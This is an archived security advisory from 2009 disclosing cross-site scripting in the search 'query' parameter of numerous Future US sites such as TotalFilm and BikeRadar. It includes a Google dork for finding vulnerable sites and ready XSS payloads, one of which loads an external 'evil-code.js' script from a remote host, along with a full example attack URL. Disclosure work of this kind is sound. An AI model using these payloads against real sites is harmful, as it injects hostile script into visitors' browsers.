Copyright 2008 Future US Cross Site Scripting

Copyright 2008 Future US Cross Site Scripting: Posted Jan 20, 2009; Authored by Ivan Sanchez | Site nullcode.com.ar; Copyright 2008 Future US products suffer from cross site scripting vulnerabilities.; tags | exploit, vulnerability, xss; MD5 | 978fe299e63bbda7b43386ce39caa5f7; Download | Favorite | Comments (0)

Copyright 2008 Future US Cross Site Scripting

                             NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!
+===================================================================================================================+
+                 Copyright  2008   - Copyright 2008 Future US //Cross-site scripting (XSS) Remote Java Execution   +
+===================================================================================================================+


Author(s): Ivan Sanchez 

Product: Copyright 2008 Future US 



http://www.futureus-inc.com/
http://www.dailyradar.com/

Date: 16/01/2009


A lot domains are affected:
---------------------------

MovieBlips - Your daily movie news
ShowHype - Biggest stories, best fans
TVBlips - For TV aficionados only
42Blips - For science fiction fans
ComicsBlips - Excelsior! Comics news galore!
TotalFilm - Welcome to the movies!
BallHype - Best stories, biggest fans
ActionSportsBlips - Surf, Skate, Ski, Snowboard
BikeRadar - The world is for riding
MMABlips - News to fight for
RacingBlips - News built for speed
CyclingNews - The world centre of cycling
WallStreetBlips - Show me the money
BeltwayBlips - All politics, all the time
EarthBlips - Re-imagine the planet


much more......

Exploited  from querystring or put into the texbox some evil xss-code or external java code , and then you can see the querystring :-
or directly you put the evil code on the querystring .



GOOGLE DORKS:
------------

intext:"Copyright 2008 Future US"



Parameter Affected:
-------------------

query=%22%3E%3Cscript%20src=http://nullcode.com.ar/thirdparty/scripts/evil-code.js%3E%3C/script%3E

query="><script>alert(/CCC/)</script>&t=advanced&s=0&d=0&start=60

query="></a><script>alert(1);</script>



Example url:
http://domain/search/?query=%22%3E%3Cscript%20src=http://nullcode.com.ar/thirdparty/scripts/evil-code.js%3E%3C/script%3E


Remediation: Validate the Input. 
------------





                          NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!

+===================================================================================================================+
+                 Copyright  2008   - Copyright 2008 Future US // Cross-site scripting (XSS) Remote Java Execution  +
+===================================================================================================================+

Comments

Subscribe to this comment feed

No comments yet, be the first!

Top Authors In Last 30 Days

Heine Pedersen 29 files
Torben Jensen 29 files
Farbod Mahini 26 files
Ubuntu 26 files
Red Hat 25 files
Debian 24 files
Mandriva 17 files
sinn3r 11 files
the_cyber_nuxbie 10 files
Am!r 9 files

File Archives

Systems

AIX (352)
Apple (963)
BSD (302)
Cisco (1,247)
Debian (3,802)
Fedora (1,660)
FreeBSD (1,024)
Gentoo (2,468)
HPUX (685)
iPhone (95)
IRIX (217)
Juniper (60)
Linux (20,649)
Mac OS X (415)
Mandriva (2,205)
NetBSD (235)
OpenBSD (414)
RedHat (2,431)
Slackware (378)
Solaris (1,472)
SUSE (1,228)
Ubuntu (2,728)
UNIX (6,852)
UnixWare (148)
Windows (4,019)
Other

Copyright 2008 Future US Cross Site Scripting

Copyright 2008 Future US Cross Site Scripting

Comments

File Archive:

May 2012

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Copyright 2008 Future US Cross Site Scripting

Share This

Copyright 2008 Future US Cross Site Scripting

Comments

File Archive:

May 2012

Top Authors In Last 30 Days

File Tags

File Archives

Systems